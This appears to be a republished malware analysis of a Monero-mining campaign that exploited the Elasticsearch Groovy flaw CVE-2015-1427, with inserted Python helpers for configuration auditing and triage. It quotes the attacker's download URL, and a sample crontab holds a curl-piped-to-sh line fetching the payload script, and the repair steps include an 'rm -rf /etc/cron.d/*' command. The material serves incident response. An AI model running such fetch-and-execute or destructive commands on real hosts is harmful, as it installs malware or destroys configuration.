2025-02-25 Update From: SLTechnology News&Howtos, Network Security
Shulou (Shulou.com) 05/31 Report
Many inexperienced readers may not know how to analyze a Monero mining incident that exploited the ElasticSearch Groovy vulnerability. This article therefore summarizes the cause of the problem and its solutions; I hope it helps you resolve the issue.
I. Overview
On June 13, 2019, Antian Honeynet captured an attack that exploited CVE-2015-1427, a remote command execution vulnerability in ElasticSearch (Groovy). The vulnerability exists because Elasticsearch uses Groovy as a scripting language and relies on a sandbox mechanism based on a blacklist and whitelist to block dangerous code; the sandbox is not strict enough and can be bypassed, which results in remote code execution. We performed a detailed sample analysis of the incident and give recommendations for prevention and repair.
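The overview attributes the vulnerability to the bypassable Groovy sandbox. As an added example that is not part of the original report, the following Python script audits an Elasticsearch 1.x elasticsearch.yml for the two settings that neutralise dynamic Groovy scripting (script.groovy.sandbox.enabled: false, the vendor's mitigation for CVE-2015-1427, and the older script.disable_dynamic: true). The sample configuration texts in the block are constructed; the only facts taken from the page are the vulnerability and the sandbox mechanism.

```python
"""Audit an Elasticsearch 1.x elasticsearch.yml for dynamic-scripting hardening.

Added example, not part of the original report. Either of these settings
stops dynamic Groovy scripts from being executed on an unpatched 1.3.x/1.4.x
node (upgrading to a fixed release remains the real fix):
  script.groovy.sandbox.enabled: false  # Groovy no longer counts as sandboxed
  script.disable_dynamic: true          # no dynamic scripts at all
The configuration texts below are constructed for the demonstration.
"""
import re
from typing import Dict, List

_LINE_RE = re.compile(r"^\s*([A-Za-z0-9_.]+)\s*:\s*(.*?)\s*$")


def parse_flat_yaml(text: str) -> Dict[str, str]:
    """Parse the flat 'key: value' lines that elasticsearch.yml uses.

    Comments and blank lines are ignored; the last occurrence of a key wins,
    matching how a duplicated key behaves in the real file.
    """
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        m = _LINE_RE.match(line)
        if not m:
            continue
        value = m.group(2).strip().strip('"').strip("'")
        settings[m.group(1)] = value.lower()
    return settings


def audit_scripting(text: str) -> List[str]:
    """Return findings; an empty list means dynamic Groovy is disabled."""
    s = parse_flat_yaml(text)
    sandbox_off = s.get("script.groovy.sandbox.enabled") == "false"
    dynamic_off = s.get("script.disable_dynamic") == "true"
    if sandbox_off or dynamic_off:
        return []
    findings = []
    if "script.groovy.sandbox.enabled" not in s:
        findings.append("script.groovy.sandbox.enabled not set (sandbox stays on)")
    elif not sandbox_off:
        findings.append("script.groovy.sandbox.enabled is not false")
    if "script.disable_dynamic" not in s:
        findings.append("script.disable_dynamic not set (sandboxed scripts allowed)")
    elif not dynamic_off:
        findings.append("script.disable_dynamic is not true")
    return findings


def is_hardened(text: str) -> bool:
    """True when at least one of the mitigating settings is present."""
    return not audit_scripting(text)


# Constructed sample configurations (not taken from the report).
VULNERABLE_CONFIG = """\
cluster.name: prod-search
node.name: es-node-1
# sandbox left enabled, which is what CVE-2015-1427 bypasses
script.groovy.sandbox.enabled: true
"""

HARDENED_CONFIG = """\
cluster.name: prod-search
node.name: es-node-1
script.groovy.sandbox.enabled: false   # vendor mitigation
script.disable_dynamic: true
"""

if __name__ == "__main__":
    for name, cfg in (("vulnerable", VULNERABLE_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{name}: {audit_scripting(cfg) or 'OK'}")
```

Run it against a copy of the node's elasticsearch.yml; any finding means dynamic Groovy scripts reach the engine and the node should be patched or the setting added and the node restarted.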
II. Sample Analysis
2.1 Key attack payload
Judging from the attack payload, the attacker uses Groovy as the scripting language and sends a JSON script containing the malicious link http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh to the _search?pretty endpoint; the script downloads the malicious shell script, achieving remote code execution and carrying out mining.
Figure 2-1 packet content
The core code after decryption:
Figure 2-2 Core Code
2.2 Sample analysis
1) Intrusion script analysis: init.sh
The attacker downloads and executes the malicious script init.sh from http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh to implant the Dog mining program, and also performs host scanning and other operations.
Figure 2-3 turn off the firewall
After that, the script turns off the firewall, disables SELinux, frees occupied resources, kills other mining-related processes, sets up scheduled tasks (downloading the executable update.sh every 30 minutes), obtains SSH access, forwards and modifies iptables rules, and cleans up the related operation history, logs and other traces.
Figure 2-4 check and kill other existing mining processes
Figure 2-5 set up scheduled tasks
Figure 2-6 malicious script download address, backup address and size setting
Figure 2-7 cleaning up related logs and history
During this process, the script checks whether the three processes sysupdate, networkservice and sysguard are running, and starts any that are not.
Figure 2-8 when one of the three is killed, the scheduled task restarts it
2) Sample analysis: sysguard, networkservice, sysupdate
The three samples are written in Go and packed with UPX; the corresponding main_main function structures are as follows:
Figure 2-9 sysguard-main_main function structure
Figure 2-10 networkservice-main_main function structure
Figure 2-11 sysupdate-main function
Comparison with the previously captured systemctI samples shows that the attack is divided into three processes: mining, scanning and function calling. The relevant exploit function and scan function are found in the networkservice sample.
Figure 2-12 networkservice scan function
Comparison with the previously captured samples shows that the two attacks are similar, except that this attack is carried out through three processes: sysguard, networkservice (scanning) and sysupdate. This also means that when a server is found to be infected, all three processes should be killed at the same time.
3) Configuration file: config.json
In the downloaded configuration file, we found several mining pool addresses:
Table 2-1 list of mining pools
Figure 2-13 config.json
III. Affected services and vulnerabilities
Table 3-1 affected services and vulnerabilities
IV. IOC
Table 4-1 attack IP
Table 4-2 URL
Table 4-3 MD5
V. Prevention and repair recommendations
Prevention recommendations:
A) Ensure that the system and applications download and install the latest official patches in a timely manner
B) Prohibit the use of weak passwords
C) Periodically check the server for anomalies, such as persistently high CPU usage and disk anomalies
D) Install endpoint threat protection products
Repair recommendations:
A) Disconnect from the network, back up important crontab entries, then stop or delete the scheduled tasks: systemctl stop crontab or rm -rf /etc/cron.d/*
B) Lock the malicious files referenced in crontab
C) View and kill the virus processes: kill the sysguard, networkservice and sysupdate processes at the same time
D) Delete the virus-related files
E) After confirmation, restart the server and install the vulnerability patch.
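The repair steps above depend on two details from the analysis: the three Go binaries restart each other, so they must be killed in one go, and the cron entry that re-fetches update.sh must be removed first. The following Python triage helper is an added example, not part of the original report: it works on captured text (ps output and a crontab dump) so it can be tested offline, builds a single kill command for all three PIDs, and lists the crontab lines that reference the report's download host, path or update.sh. The ps output and crontab text in the block are constructed; the process names, IP address and URL path are the indicators quoted in the report.

```python
"""Triage helper for the sysguard / networkservice / sysupdate miner.

Added example, not from the original report. Indicators (process names,
download host 185.181.10.234, path E5DB0E07C3D7BE80V520, update.sh) are the
ones the report quotes; the ps output and crontab below are constructed.
"""
from dataclasses import dataclass
from typing import List

MINER_PROCESS_NAMES = {"sysguard", "networkservice", "sysupdate"}
CRON_INDICATORS = ("185.181.10.234", "e5db0e07c3d7be80v520", "update.sh")


@dataclass
class Plan:
    pids: List[int]
    cron_lines: List[str]

    def kill_command(self) -> str:
        """One kill for every PID, so no watchdog survives to restart the rest."""
        if not self.pids:
            return ""
        return "kill -9 " + " ".join(str(p) for p in self.pids)


def find_miner_pids(ps_output: str) -> List[int]:
    """Parse `ps -eo pid,comm` style output; return PIDs of the three miners."""
    pids = []
    for line in ps_output.splitlines()[1:]:  # first line is the header
        parts = line.split(None, 1)
        if len(parts) != 2 or not parts[0].isdigit():
            continue
        name = parts[1].strip().split("/")[-1]  # tolerate a full path
        if name in MINER_PROCESS_NAMES:
            pids.append(int(parts[0]))
    return sorted(pids)


def find_cron_indicators(crontab_text: str) -> List[str]:
    """Return crontab lines that reference the report's download indicators."""
    hits = []
    for line in crontab_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if any(ind in stripped.lower() for ind in CRON_INDICATORS):
            hits.append(stripped)
    return hits


def build_plan(ps_output: str, crontab_text: str) -> Plan:
    return Plan(find_miner_pids(ps_output), find_cron_indicators(crontab_text))


# Constructed sample inputs for the demonstration.
SAMPLE_PS = """\
  PID COMMAND
    1 systemd
  842 sshd
 2310 sysguard
 2311 networkservice
 2312 /tmp/sysupdate
 2399 bash
"""

SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
*/30 * * * * curl -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/update.sh | sh
"""

if __name__ == "__main__":
    plan = build_plan(SAMPLE_PS, SAMPLE_CRONTAB)
    print("kill together:", plan.kill_command())
    print("crontab lines to remove:")
    for entry in plan.cron_lines:
        print("  ", entry)
```

On a live host, feed it the output of `ps -eo pid,comm` and `crontab -l` (plus the files under /etc/cron.d); remove the listed cron lines before running the kill command, otherwise the next scheduled run simply reinstalls the three processes.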
After reading the above, do you now know how to analyze a Monero mining incident that exploited the ElasticSearch Groovy vulnerability? If you want to learn more skills or find out more, you are welcome to follow the industry information channel. Thank you for reading!